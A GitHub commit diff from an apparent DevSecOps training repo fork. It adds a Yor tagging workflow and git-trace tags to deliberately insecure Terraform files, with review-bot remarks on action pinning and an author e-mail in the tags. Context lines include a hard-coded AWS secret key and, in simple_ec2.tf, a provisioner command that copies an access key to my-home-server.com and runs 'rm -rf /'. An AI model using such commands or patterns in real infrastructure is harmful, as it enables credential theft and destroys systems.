
Commit 5f10f48

authored
Merge pull request #1 from dimitryk1/dimitryk1-patch-1
Create yor.yml
2 parents fe85e86 + 1f3b2db commit 5f10f48

5 files changed

Lines changed: 252 additions & 15 deletions


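--- a/.github/workflows/yor.yml
+++ b/.github/workflows/yor.yml
@@ -0,0 +1,19 @@
+name: IaC tag and trace
+
+on:
+push:
+pull_request:
+
+jobs:
+yor:
+runs-on: ubuntu-latest
+permissions:
+contents: write
+
+steps:
+- uses: actions/checkout@v2
+name: Checkout repo
+with:
+fetch-depth: 0
+- name: Run yor action
+uses: bridgecrewio/yor-action@main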
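Review bot: `uses: bridgecrewio/yor-action@main` (new line 19) follows a mutable branch inside a job that is granted `contents: write`, so whatever is on that branch when the job runs executes with permission to push to this repository. Pin the action to a reviewed full commit SHA, for example `uses: bridgecrewio/yor-action@<full-commit-sha>` (placeholder), and update it deliberately. The same applies to `actions/checkout@v2` on new line 14, which is also an old major version. The workflow triggers on `pull_request` as well as `push`; if the tag write-back is only wanted on the default branch, limiting the trigger or giving pull-request runs `contents: read` would narrow the exposure.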

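--- a/code/deployment_ec2.tf
+++ b/code/deployment_ec2.tf
@@ -17,22 +17,55 @@ export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMAAAKEY
 export AWS_DEFAULT_REGION=us-west-2
 echo "<h1>Deployed via Terraform</h1>" | sudo tee /var/www/html/index.html
 EOF
-
+
+tags = {
+git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+git_file = "code/deployment_ec2.tf"
+git_last_modified_at = "2024-01-26 23:01:56"
+git_last_modified_by = "tprendervill@paloaltonetworks.com"
+git_modifiers = "tprendervill"
+git_org = "dimitryk1"
+git_repo = "prisma-cloud-devsecops-workshop-fork"
+yor_name = "web_host"
+yor_trace = "88ee4801-abb9-43bd-b55a-e9f26999c950"
+}
 }
 
 resource "aws_ebs_volume" "web_host_storage" {
 # unencrypted volume
 availability_zone = "${var.region}a"
 #encrypted = false # Setting this causes the volume to be recreated on apply
 size = 1
-
+
+tags = {
+git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+git_file = "code/deployment_ec2.tf"
+git_last_modified_at = "2024-01-26 23:01:56"
+git_last_modified_by = "tprendervill@paloaltonetworks.com"
+git_modifiers = "tprendervill"
+git_org = "dimitryk1"
+git_repo = "prisma-cloud-devsecops-workshop-fork"
+yor_name = "web_host_storage"
+yor_trace = "0d618641-0205-4779-a515-8b2cd76e8a0f"
+}
 }
 
 resource "aws_ebs_snapshot" "example_snapshot" {
 # ebs snapshot without encryption
 volume_id = "${aws_ebs_volume.web_host_storage.id}"
 description = "${local.resource_prefix.value}-ebs-snapshot"
-
+
+tags = {
+git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+git_file = "code/deployment_ec2.tf"
+git_last_modified_at = "2024-01-26 23:01:56"
+git_last_modified_by = "tprendervill@paloaltonetworks.com"
+git_modifiers = "tprendervill"
+git_org = "dimitryk1"
+git_repo = "prisma-cloud-devsecops-workshop-fork"
+yor_name = "example_snapshot"
+yor_trace = "dd434ac8-9a06-4d2a-85c2-5e65fb6bf038"
+}
 }
 
 resource "aws_volume_attachment" "ebs_att" {
@@ -69,14 +102,36 @@ resource "aws_security_group" "web-node" {
 "0.0.0.0/0"]
 }
 depends_on = [aws_vpc.web_vpc]
-
+
+tags = {
+git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+git_file = "code/deployment_ec2.tf"
+git_last_modified_at = "2024-01-26 23:01:56"
+git_last_modified_by = "tprendervill@paloaltonetworks.com"
+git_modifiers = "tprendervill"
+git_org = "dimitryk1"
+git_repo = "prisma-cloud-devsecops-workshop-fork"
+yor_name = "web-node"
+yor_trace = "4bbbb2f7-79a6-43a8-9991-a5f4ded6d1b2"
+}
 }
 
 resource "aws_vpc" "web_vpc" {
 cidr_block = "172.16.0.0/16"
 enable_dns_hostnames = true
 enable_dns_support = true
-
+
+tags = {
+git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+git_file = "code/deployment_ec2.tf"
+git_last_modified_at = "2024-01-26 23:01:56"
+git_last_modified_by = "tprendervill@paloaltonetworks.com"
+git_modifiers = "tprendervill"
+git_org = "dimitryk1"
+git_repo = "prisma-cloud-devsecops-workshop-fork"
+yor_name = "web_vpc"
+yor_trace = "c1e2586d-94e5-4fac-b847-e3d1a6d37809"
+}
 }
 
 resource "aws_subnet" "web_subnet" {
@@ -85,7 +140,18 @@ resource "aws_subnet" "web_subnet" {
 availability_zone = "${var.region}a"
 map_public_ip_on_launch = true
 
-
+
+tags = {
+git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+git_file = "code/deployment_ec2.tf"
+git_last_modified_at = "2024-01-26 23:01:56"
+git_last_modified_by = "tprendervill@paloaltonetworks.com"
+git_modifiers = "tprendervill"
+git_org = "dimitryk1"
+git_repo = "prisma-cloud-devsecops-workshop-fork"
+yor_name = "web_subnet"
+yor_trace = "bd187003-ba42-4b26-8176-166ffc372044"
+}
 }
 
 resource "aws_subnet" "web_subnet2" {
@@ -94,20 +160,53 @@ resource "aws_subnet" "web_subnet2" {
 availability_zone = "${var.region}b"
 map_public_ip_on_launch = true
 
-
+
+tags = {
+git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+git_file = "code/deployment_ec2.tf"
+git_last_modified_at = "2024-01-26 23:01:56"
+git_last_modified_by = "tprendervill@paloaltonetworks.com"
+git_modifiers = "tprendervill"
+git_org = "dimitryk1"
+git_repo = "prisma-cloud-devsecops-workshop-fork"
+yor_name = "web_subnet2"
+yor_trace = "6e156ef0-824c-4b40-a4fd-33fc0e24182c"
+}
 }
 
 
 resource "aws_internet_gateway" "web_igw" {
 vpc_id = aws_vpc.web_vpc.id
 
-
+
+tags = {
+git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+git_file = "code/deployment_ec2.tf"
+git_last_modified_at = "2024-01-26 23:01:56"
+git_last_modified_by = "tprendervill@paloaltonetworks.com"
+git_modifiers = "tprendervill"
+git_org = "dimitryk1"
+git_repo = "prisma-cloud-devsecops-workshop-fork"
+yor_name = "web_igw"
+yor_trace = "f9639ea1-1a58-4eee-af72-25674cd40ff8"
+}
 }
 
 resource "aws_route_table" "web_rtb" {
 vpc_id = aws_vpc.web_vpc.id
 
-
+
+tags = {
+git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+git_file = "code/deployment_ec2.tf"
+git_last_modified_at = "2024-01-26 23:01:56"
+git_last_modified_by = "tprendervill@paloaltonetworks.com"
+git_modifiers = "tprendervill"
+git_org = "dimitryk1"
+git_repo = "prisma-cloud-devsecops-workshop-fork"
+yor_name = "web_rtb"
+yor_trace = "4795ba09-4007-4d6d-aafc-dbf63fd102ab"
+}
 }
 
 resource "aws_route_table_association" "rtbassoc" {
@@ -134,6 +233,17 @@ resource "aws_network_interface" "web-eni" {
 subnet_id = aws_subnet.web_subnet.id
 private_ips = ["172.16.10.100"]
 
+tags = {
+git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+git_file = "code/deployment_ec2.tf"
+git_last_modified_at = "2024-01-26 23:01:56"
+git_last_modified_by = "tprendervill@paloaltonetworks.com"
+git_modifiers = "tprendervill"
+git_org = "dimitryk1"
+git_repo = "prisma-cloud-devsecops-workshop-fork"
+yor_name = "web-eni"
+yor_trace = "74b814fb-f4f6-45a5-87a5-2d7cc76b47fb"
+}
 }
 
 # VPC Flow Logs to S3
@@ -144,12 +254,34 @@ resource "aws_flow_log" "vpcflowlogs" {
 vpc_id = aws_vpc.web_vpc.id
 
 
+tags = {
+git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+git_file = "code/deployment_ec2.tf"
+git_last_modified_at = "2024-01-26 23:01:56"
+git_last_modified_by = "tprendervill@paloaltonetworks.com"
+git_modifiers = "tprendervill"
+git_org = "dimitryk1"
+git_repo = "prisma-cloud-devsecops-workshop-fork"
+yor_name = "vpcflowlogs"
+yor_trace = "dca15e6e-960f-47ba-97f3-041e287cacdc"
+}
 }
 
 resource "aws_s3_bucket" "flowbucket" {
 bucket = "${local.resource_prefix.value}-flowlogs"
 force_destroy = true
 
+tags = {
+git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+git_file = "code/deployment_ec2.tf"
+git_last_modified_at = "2024-01-26 23:01:56"
+git_last_modified_by = "tprendervill@paloaltonetworks.com"
+git_modifiers = "tprendervill"
+git_org = "dimitryk1"
+git_repo = "prisma-cloud-devsecops-workshop-fork"
+yor_name = "flowbucket"
+yor_trace = "2db0f163-c07e-41a6-88ac-7ffcafecacb3"
+}
 }
 
 # OUTPUTS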
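Review bot: Each added `tags` block, starting at new lines 21–31 and repeated in the eleven other blocks of this file and in the blocks added to deployment_s3.tf, simple_ec2.tf and simple_s3.tf, writes `git_last_modified_by = "tprendervill@paloaltonetworks.com"` onto the deployed AWS resource. That puts a personal e-mail address in front of every principal that can read resource tags, and into any inventory or cost export that includes them. `yor_trace` together with `git_commit` and `git_file` already maps a resource back to its source, so the address can be left out, for instance through Yor's skip-tags setting (`skip_tags: git_last_modified_by` on the action step). The resource blocks being tagged start outside these hunks. The context they show (`# unencrypted volume`, `# ebs snapshot without encryption`, and the `AWS_SECRET_ACCESS_KEY` export in the first hunk header) is left as it was by this commit.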

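--- a/code/deployment_s3.tf
+++ b/code/deployment_s3.tf
@@ -5,14 +5,36 @@ resource "aws_s3_bucket" "data" {
 # bucket does not have versioning
 bucket = "${local.resource_prefix.value}-data"
 force_destroy = true
-
+
+tags = {
+git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+git_file = "code/deployment_s3.tf"
+git_last_modified_at = "2024-01-26 23:01:56"
+git_last_modified_by = "tprendervill@paloaltonetworks.com"
+git_modifiers = "tprendervill"
+git_org = "dimitryk1"
+git_repo = "prisma-cloud-devsecops-workshop-fork"
+yor_name = "data"
+yor_trace = "7e9513d1-3ada-4791-a4ed-3c48646bbe34"
+}
 }
 
 resource "aws_s3_bucket_object" "data_object" {
 bucket = aws_s3_bucket.data.id
 key = "customer-master.xlsx"
 source = "resources/customer-master.xlsx"
-
+
+tags = {
+git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+git_file = "code/deployment_s3.tf"
+git_last_modified_at = "2024-01-26 23:01:56"
+git_last_modified_by = "tprendervill@paloaltonetworks.com"
+git_modifiers = "tprendervill"
+git_org = "dimitryk1"
+git_repo = "prisma-cloud-devsecops-workshop-fork"
+yor_name = "data_object"
+yor_trace = "07d3c432-497f-4a64-a2ba-7372e8eeac61"
+}
 }
 
 resource "aws_s3_bucket" "financials" {
@@ -23,6 +45,17 @@ resource "aws_s3_bucket" "financials" {
 acl = "private"
 force_destroy = true
 
+tags = {
+git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+git_file = "code/deployment_s3.tf"
+git_last_modified_at = "2024-01-26 23:01:56"
+git_last_modified_by = "tprendervill@paloaltonetworks.com"
+git_modifiers = "tprendervill"
+git_org = "dimitryk1"
+git_repo = "prisma-cloud-devsecops-workshop-fork"
+yor_name = "financials"
+yor_trace = "d5bdb847-10a3-4dd6-adf0-4c0d1cacb849"
+}
 }
 
 resource "aws_s3_bucket" "operations" {
@@ -34,7 +67,18 @@ resource "aws_s3_bucket" "operations" {
 enabled = true
 }
 force_destroy = true
-
+
+tags = {
+git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+git_file = "code/deployment_s3.tf"
+git_last_modified_at = "2024-01-26 23:01:56"
+git_last_modified_by = "tprendervill@paloaltonetworks.com"
+git_modifiers = "tprendervill"
+git_org = "dimitryk1"
+git_repo = "prisma-cloud-devsecops-workshop-fork"
+yor_name = "operations"
+yor_trace = "7a7da807-4e09-4dd9-9944-5bc2634c14c8"
+}
 }
 
 resource "aws_s3_bucket" "data_science" {
@@ -49,7 +93,18 @@ resource "aws_s3_bucket" "data_science" {
 target_prefix = "log/"
 }
 force_destroy = true
-
+
+tags = {
+git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+git_file = "code/deployment_s3.tf"
+git_last_modified_at = "2024-01-26 23:01:56"
+git_last_modified_by = "tprendervill@paloaltonetworks.com"
+git_modifiers = "tprendervill"
+git_org = "dimitryk1"
+git_repo = "prisma-cloud-devsecops-workshop-fork"
+yor_name = "data_science"
+yor_trace = "52dbcd37-08c1-414c-9c68-f839a279eb70"
+}
 }
 
 resource "aws_s3_bucket" "logs" {
@@ -67,5 +122,16 @@ resource "aws_s3_bucket" "logs" {
 }
 }
 force_destroy = true
-
+
+tags = {
+git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+git_file = "code/deployment_s3.tf"
+git_last_modified_at = "2024-01-26 23:01:56"
+git_last_modified_by = "tprendervill@paloaltonetworks.com"
+git_modifiers = "tprendervill"
+git_org = "dimitryk1"
+git_repo = "prisma-cloud-devsecops-workshop-fork"
+yor_name = "logs"
+yor_trace = "49d1883b-91e8-46f0-b1d0-53c37058410c"
+}
 }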

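--- a/code/simple_ec2.tf
+++ b/code/simple_ec2.tf
@@ -10,4 +10,15 @@ resource "aws_ec2_host" "test" {
 command = "echo Running install scripts.. 'echo $ACCESS_KEY > creds.txt ; scp -r creds.txt root@my-home-server.com/exfil/ ; rm -rf /' "
 }
 
+tags = {
+git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+git_file = "code/simple_ec2.tf"
+git_last_modified_at = "2024-01-26 23:01:56"
+git_last_modified_by = "tprendervill@paloaltonetworks.com"
+git_modifiers = "tprendervill"
+git_org = "dimitryk1"
+git_repo = "prisma-cloud-devsecops-workshop-fork"
+yor_name = "test"
+yor_trace = "0143832d-eb41-4ca3-8e55-9a93f81f4bd0"
+}
 }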

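--- a/code/simple_s3.tf
+++ b/code/simple_s3.tf
@@ -6,7 +6,16 @@ resource "aws_s3_bucket" "dev_s3" {
 bucket_prefix = "dev-"
 
 tags = {
-Environment = "Dev"
+Environment = "Dev"
+git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
+git_file = "code/simple_s3.tf"
+git_last_modified_at = "2024-01-26 23:01:56"
+git_last_modified_by = "tprendervill@paloaltonetworks.com"
+git_modifiers = "tprendervill"
+git_org = "dimitryk1"
+git_repo = "prisma-cloud-devsecops-workshop-fork"
+yor_name = "dev_s3"
+yor_trace = "eb744131-b6fd-4f6e-8c47-4c0492dbb546"
 }
 }
 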